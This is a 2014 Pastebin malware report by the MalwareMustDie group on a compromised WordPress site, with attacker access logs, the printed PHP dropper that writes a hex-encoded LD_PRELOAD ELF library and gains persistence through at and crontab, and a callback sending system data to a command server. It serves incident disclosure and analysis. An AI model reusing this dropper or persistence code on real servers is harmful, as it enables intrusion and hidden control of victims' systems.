SHARE
TWEET

LD_PRELOAD .SO ELF MALWARE FRESH ATTACK FROM OVH, FRANCE!

MalwareMustDie May 27th, 2014 2,054 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie!! LD_PRELOAD .SO ELF MALWARE FRESH ATTACK FROM OVH, FRANCE!
  2. // Date: 03:28 -!- sendak.freenode.net Tuesday May 27 2014 -- 21:28:36 +03:00
  3. //
  4. // This is the evidence that OVH, France IP address of :
  5. // ns238857.ip-176-31-251.eu (176.31.251.103) which network details:
  6. // ASN : 16276 |Prefix: 176.31.0.0/16 | OVH | FR | OVH.COM | OVH SAS
  7. // is used to attack Wordpress sites in multiple services,
  8. // and executing the hacked fake oldstyle.php script to install malware,
  9. // with the malicious definition known as .SO (LD_PRELOAD) ELF malware
  10. //Reference: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html
  11.  
  12.  
  13. //====================================
  14. // Installation Evidence Log
  15. //====================================
  16.  
  17. // malware remote installation & execution evidence log:
  18.  
  19. ns238857.ip-176-31-251.eu - - [27/May/2014:08:24:14 +0900] "GET /wp/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/oldstyle.php HTTP/1.1" 200 113 "-" "Python-urllib/2.7" "-"
  20.  
  21. //====================================
  22. // Malware code in the oldstyle.php
  23. //====================================
  24.  
  25. $ cat oldstyle.php
  26.  
  27.  
  28. <?php
  29.  
  30. header("Content-type: text/plain");
  31. print "2842123700\n";
  32.  
  33. if (! function_exists('file_put_contents')) {
  34.         function file_put_contents($filename, $data) {
  35.                 $f = @fopen($filename, 'w');
  36.                 if (! $f)
  37.                         return false;
  38.                 $bytes = fwrite($f, $data);
  39.                 fclose($f);
  40.                 return $bytes;
  41.         }
  42. }
  43.  
  44. @system("killall -9 ".basename("/usr/bin/host"));
  45.  
  46. $so32 = "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00\x01\x00\x00\x00\x54\x0d\x00\x00\x34\x00\x00\x00\xb8\x59\x01\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x16\x00\x13\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfb\x60\x00\x00\xfb\x60\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\xfc\x60\x00\x00\xfc\x70\x00\x00\xfc\x70\x00\x00\xf0\x07\x00\x00\xac\x61\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00\xfc\x60\x00\x00\xfc\x70\x00\x00\xfc\x70\x00\x00\x90\x00\x00\x00\x90\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x25\x00\x00\x00\x3c\x00\x00\x00\x21\x00\x00\x00\x31\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x2c\x00\x00\x00\x11\x00\x00\x00\x1c\x00\x00\x00\x28\x00\x00\x00\x2f\x00\x00\x00\x3b\x00\x00\x00\x29\x00\x00\x00\x39\x00\x00\x00\x15\x00\x00\x00\x05\x00\x00\x00\x2d\x00\x00\x00\x00\x00\x00\x00\x38\x00\x00\x00\x33\x00\x00\x00\x1b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\x00\x00\x00\x00\x00\x00\x00\x32\x00\x00\x00\x1e\x00\x00\x00\x3a\x00\x00\x00\x2a\x00\x00\x00\x34\x00\x00\x00\x36\x00\x00\x00\x23\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x1d\x00\x00\x00\x19\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x27\x00\x00\x00\x25\x00\x00\x00\x22\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x26\x00\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x2e\x00\x00\x00\x1f\x00\x00\x00\x35\x00\x00\x00\x37\x00\x00\x00\x13\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x57\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\xe6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\xad\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\xb6\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x87\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x23\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\xa5\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x0
  47. [snipped...] ";
  48. $so64 = "\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x3e\x00\x01\x00\x00\x00\x78\x13\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xf0\xc4\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x38\x00\x03\x00\x40\x00\x16\x00\x13\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x60\x00\x00\x00\x00\x00\x00\xf0\x60\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xf0\x60\x00\x00\x00\x00\x00\x00\xf0\x60\x20\x00\x00\x00\x00\x00\xf0\x60\x20\x00\x00\x00\x00\x00\x98\x09\x00\x00\x00\x00\x00\x00\x08\x75\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\xf0\x60\x00\x00\x00\x00\x00\x00\xf0\x60\x20\x00\x00\x00\x00\x00\xf0\x60\x20\x00\x00\x00\x00\x00\x20\x01\x00\x00\x00\x00\x00\x00\x20\x01\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x25\x00\x00\x00\x3d\x00\x00\x00\x22\x00\x00\x00\x32\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x31\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x2d\x00\x00\x00\x12\x00\x00\x00\x1d\x00\x00\x00\x29\x00\x00\x00\x30\x00\x00\x00\x3c\x00\x00\x00\x2a\x00\x00\x00\x3a\x00\x00\x00\x16\x00\x00\x00\x06\x00\x00\x00\x2e\x00\x00\x00\x00\x00\x00\x00\x39\x00\x00\x00\x34\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x25\x00\x00\x00\x00\x00\x00\x00\x33\x00\x00\x00\x1f\x00\x00\x00\x3b\x00\x00\x00\x2b\x00\x00\x00\x35\x00\x00\x00\x37\x00\x00\x00\x24\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x0d\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00\x1e\x00\x00\x00\x1a\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x28\x00\x00\x00\x26\x00\x00\x00\x23\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x27\x00\x00\x00\x2c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x2f\x00\x00\x00\x20\x00\x00\x00\x36\x00\x00\x00\x38\x00\x00\x00\x14\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x07\x00\x78\x13\x00\x00\x00\x00\x00\x00\x0[snipped...] ";
  49. $arch = 64;
  50. if (intval("9223372036854775807") == 2147483647)
  51.         $arch = 32;
  52. print "Arch is ".$arch."\n";
  53. $so = $arch == 32 ? $so32 : $so64;
  54. $f = fopen("/usr/bin/host", "rb");
  55. if ($f) {
  56.         $n = unpack("C*", fread($f, 8));
  57.         $so[7] = sprintf("%c", $n[8]);
  58.         print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."\n";
  59.         fclose($f);
  60. }
  61. print "SO dumped ".file_put_contents("./rss-aggr.so", $so)."\n";
  62. if (getenv("MAYHEM_DEBUG"))
  63.         exit(0);
  64. $AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  65. /* second stage dropper */
  66. $HBN=basename("/usr/bin/host");
  67. $SCP=getcwd();
  68. $SCR  ="#!/bin/sh\ncd '".$SCP."'\nif [ -f './rss-aggr.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./rss-aggr.so\n/usr/bin/host\nunset LD_PRELOAD\n";
  69. $SCR .="crontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n";
  70. @file_put_contents("1.sh", $SCR);
  71. @chmod("1.sh", 0777);
  72. /* try at now, file will be removed, crontab cleaned on success */
  73. @system("at now -f 1.sh", $ret);
  74. if ($ret == 0) {
  75.         for ($i = 0; $i < 5; $i++) {
  76.                 if (! @file_exists("1.sh")) {
  77.                         print "AT success\n";
  78.                         exit(0);
  79.                 }
  80.                 sleep(1);
  81.         }
  82. }
  83. @system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
  84. if ($ret == 0) {
  85.         for ($i = 0; $i < 62; $i++) {
  86.                 if (! @file_exists("1.sh")) {
  87.                         print "CRONTAB success\n";
  88.                         exit(0);
  89.                 }
  90.                 sleep(1);
  91.         }
  92. }
  93. print "Running straight\n";
  94. @system("./1.sh");
  95.  
  96. ?>
  97.  
  98. //=========================
  99. // Attack session...(TODAY)
  100. //=========================
  101.  
  102. ns238857.ip-176-31-251.eu - - [27/May/2014:07:15:42 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 68452 "-" "Mozilla/5.0 (Windows NT 6.0; rv:24.0) Gecko/20100101 Firefox/24.0" "-"
  103.  
  104. ns238857.ip-176-31-251.eu - - [27/May/2014:07:15:43 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 10139 "-" "Mozilla/5.0 (Windows NT 6.0; rv:21.0) Gecko/20130331 Firefox/21.0" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635"
  105.  
  106. ns238857.ip-176-31-251.eu - - [27/May/2014:07:26:22 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 309874 "-" "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635; 0a4673cd7b4e1c6f285fce5516ace5afajax=0"
  107.  
  108. ns238857.ip-176-31-251.eu - - [27/May/2014:08:24:14 +0900] "GET /wp/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/oldstyle.php HTTP/1.1" 200 113 "-" "Python-urllib/2.7" "-"
  109.  
  110. ns238857.ip-176-31-251.eu - - [27/May/2014:08:37:07 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 26722 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" "-"
  111.  
  112. ns238857.ip-176-31-251.eu - - [27/May/2014:08:37:10 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 10955 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635"
  113.  
  114. ns238857.ip-176-31-251.eu - - [27/May/2014:08:37:11 +0900] "GET /wp/wp-content/themes/twentytwelve/content.php?req=echo'req'; HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635; 0a4673cd7b4e1c6f285fce5516ace5afajax=0"
  115.  
  116. ns238857.ip-176-31-251.eu - - [27/May/2014:08:37:12 +0900] "GET /wp/wp-admin/options-discussion.php?req=echo'req'; HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635; 0a4673cd7b4e1c6f285fce5516ace5afajax=0"
  117.  
  118. ns238857.ip-176-31-251.eu - - [27/May/2014:08:37:13 +0900] "GET /wp/wp-admin/includes/revision.php?req=echo'req'; HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635; 0a4673cd7b4e1c6f285fce5516ace5afajax=0"
  119.  
  120. ns238857.ip-176-31-251.eu - - [27/May/2014:08:37:15 +0900] "GET /wp/wp-admin/includes/class-wp-comments-list-table.php?req=echo'req'; HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635; 0a4673cd7b4e1c6f285fce5516ace5afajax=0"
  121.  
  122. ns238857.ip-176-31-251.eu - - [27/May/2014:08:37:16 +0900] "GET /wp/wp-includes/load.php?req=echo'req'; HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635; 0a4673cd7b4e1c6f285fce5516ace5afajax=0"
  123.  
  124. //=====================================
  125. // different session... (YESTERDAY)
  126. //======================================
  127.  
  128. ns238857.ip-176-31-251.eu - - [26/May/2014:07:48:55 +0900] "GET /wp/wp-login.php HTTP/1.1" 200 3983 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "-"
  129.  
  130. ns238857.ip-176-31-251.eu - - [26/May/2014:07:48:56 +0900] "POST /wp/wp-login.php HTTP/1.1" 302 5 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check"
  131.  
  132. ns238857.ip-176-31-251.eu - - [26/May/2014:07:48:58 +0900] "GET /wp/wp-admin/ HTTP/1.1" 200 72133 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049"
  133.  
  134. ns238857.ip-176-31-251.eu - - [26/May/2014:07:49:00 +0900] "GET /wp/wp-admin/ HTTP/1.1" 200 72809 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049; wp-settings-time-1=1401058137"
  135.  
  136. ns238857.ip-176-31-251.eu - - [26/May/2014:07:49:03 +0900] "GET /wp/wp-admin/theme-editor.php HTTP/1.1" 200 28223 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049; wp-settings-time-1=1401058140"
  137.  
  138. ns238857.ip-176-31-251.eu - - [26/May/2014:07:49:04 +0900] "GET /wp/wp-admin/theme-editor.php?file=about01.php&theme=**** HTTP/1.1" 200 35390 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049; wp-settings-time-1=1401058142"
  139.  
  140. ns238857.ip-176-31-251.eu - - [26/May/2014:07:49:04 +0900] "POST /wp/wp-admin/theme-editor.php HTTP/1.1" 302 5 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049; wp-settings-time-1=1401058144"
  141.  
  142. ns238857.ip-176-31-251.eu - - [26/May/2014:07:49:06 +0900] "GET /theme-editor.php?file=about01.php&theme=****&scrollto=0&updated=true HTTP/1.1" 404 17770 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049; wp-settings-time-1=1401058144"
  143.  
  144. ns238857.ip-176-31-251.eu - - [26/May/2014:07:49:08 +0900] "POST /wp/wp-content/themes/****/about01.php HTTP/1.1" 200 59 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049; wp-settings-time-1=1401058144"
  145.  
  146. ns238857.ip-176-31-251.eu - - [26/May/2014:07:49:09 +0900] "GET /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 132 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049; wp-settings-time-1=1401058144"
  147.  
  148. ns238857.ip-176-31-251.eu - - [26/May/2014:07:49:10 +0900] "POST /wp/wp-admin/theme-editor.php HTTP/1.1" 302 5 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049; wp-settings-time-1=1401058144"
  149.  
  150. ns238857.ip-176-31-251.eu - - [26/May/2014:07:49:11 +0900] "GET /theme-editor.php?file=about01.php&theme=****&scrollto=0&updated=true HTTP/1.1" 404 17805 "-" "Opera/9.80 (Windows NT 6.1; WOW64); U) Presto/2.10.181 Version/12.00" "wordpress_test_cookie=WP+Cookie+check; wordpress_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7Cd7914bad4a2f1d680402e6c2a63239bb; wordpress_logged_in_3560dbf61260dec4dac952f40445c305=admin%7C1401230936%7C48f7dfaaa9d6a8da8bb7c9dd75721049; wp-settings-time-1=1401058144"
  151.  
  152. ns238857.ip-176-31-251.eu - - [26/May/2014:17:17:05 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 68487 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0" "-"
  153.  
  154. ns238857.ip-176-31-251.eu - - [26/May/2014:17:17:07 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 10146 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635"
  155.  
  156. ns238857.ip-176-31-251.eu - - [26/May/2014:18:17:52 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 10139 "-" "Mozilla/5.0 (Windows NT 6.0; rv:21.0) Gecko/20130331 Firefox/21.0" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635; 0a4673cd7b4e1c6f285fce5516ace5afajax=0"
  157.  
  158. ns238857.ip-176-31-251.eu - - [26/May/2014:18:21:25 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 68459 "-" "Mozilla/5.0 (Windows NT 6.0; rv:23.0) Gecko/20130406 Firefox/23.0" "-"
  159.  
  160. ns238857.ip-176-31-251.eu - - [26/May/2014:18:21:27 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 10139 "-" "Mozilla/5.0 (Windows NT 6.2; rv:21.0) Gecko/20130331 Firefox/21.0" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635"
  161.  
  162. ns238857.ip-176-31-251.eu - - [26/May/2014:18:28:12 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 10139 "-" "Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20130405 Firefox/22.0" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635; 0a4673cd7b4e1c6f285fce5516ace5afajax=0"
  163.  
  164. ns238857.ip-176-31-251.eu - - [26/May/2014:19:27:24 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 68466 "-" "Mozilla/5.0 (Windows NT 6.2; rv:21.0) Gecko/20130331 Firefox/21.0" "-"
  165.  
  166. ns238857.ip-176-31-251.eu - - [26/May/2014:19:27:26 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 10146 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635"
  167.  
  168. ns238857.ip-176-31-251.eu - - [26/May/2014:19:31:43 +0900] "POST /wp/wp-content/themes/****/styleimage.php HTTP/1.1" 200 28361 "-" "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0" "0a4673cd7b4e1c6f285fce5516ace5af=cef26cef9c9fdbdb49363368c8921635; 0a4673cd7b4e1c6f285fce5516ace5afajax=0"
  169.  
  170. // ================================
  171. // Malware CNC call back Analysis
  172. // ================================
  173.  
  174. // HTTP traces:
  175.  
  176. POST /closed.php HTTP/1.0
  177. Host: closed.red
  178. Pragma: 1337
  179. Content-Length: xxx
  180. R,20130826,(CPU x32|64),0,,{uname -a data},
  181.  
  182. // capture pic:
  183. https://lh3.googleusercontent.com/-dVvGlUpVUy8/U4Ugr_iqcrI/AAAAAAAAP48/UiB2Y-3uK4Y/s640/010.png
  184.  
  185. // IP:
  186.  
  187. $ date
  188. Wed May 28 08:02:32 JST 2014
  189. $
  190. $ echo 37.48.87.148|bash origin.sh
  191. Wed May 28 08:03:03 JST 2014|37.48.87.148|vps5106.megahoster.net.|16265 | 37.48.64.0/18 | FIBERRING | NL | LEASEWEB.COM | LEASEWEB B.V.
  192. $
  193.  
  194. ----
  195. #MalwareMustDie!
  196. analyzed & reported by @unixfreaxjp、alert by maeda shohei
  197. 03:28 -!- sendak.freenode.net Tuesday May 27 2014 -- 21:28:36 +03:00
RAW Paste Data
Want to get better at PHP?
Learn to code PHP in 2017
Pastebin PRO Summer Special!
Get 40% OFF on Pastebin PRO accounts!
Top